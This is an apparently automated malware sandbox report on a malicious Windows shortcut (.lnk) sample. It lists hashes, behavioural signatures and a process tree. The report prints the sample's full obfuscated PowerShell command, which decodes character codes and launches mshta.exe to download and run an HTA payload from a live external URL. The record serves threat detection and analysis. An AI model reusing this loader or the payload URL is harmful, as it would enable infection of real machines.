Analysis
-
max time kernel
41s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-05-2022 18:06
Static task
static1
Behavioral task
behavioral1
Sample
267-3099-39.lnk
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
267-3099-39.lnk
Resource
win10v2004-20220414-en
Behavioral task
behavioral3
Sample
54267-876-8676.lnk
Resource
win7-20220414-en
General
-
Target
54267-876-8676.lnk
-
Size
2KB
-
MD5
9edabe11d846a6de5d337e737d24e85c
-
SHA1
26f63aac40c4e9f459a379eec94a258b604f582e
-
SHA256
4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
-
SHA512
5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e
Malware Config
Extracted
https://modhub.com.br/upload.hta
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
mshta.exeflow pid process 4 1500 mshta.exe 5 1500 mshta.exe 6 1500 mshta.exe 7 1500 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 724 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1664 wrote to memory of 724 1664 cmd.exe powershell.exe PID 1664 wrote to memory of 724 1664 cmd.exe powershell.exe PID 1664 wrote to memory of 724 1664 cmd.exe powershell.exe PID 724 wrote to memory of 1500 724 powershell.exe mshta.exe PID 724 wrote to memory of 1500 724 powershell.exe mshta.exe PID 724 wrote to memory of 1500 724 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1500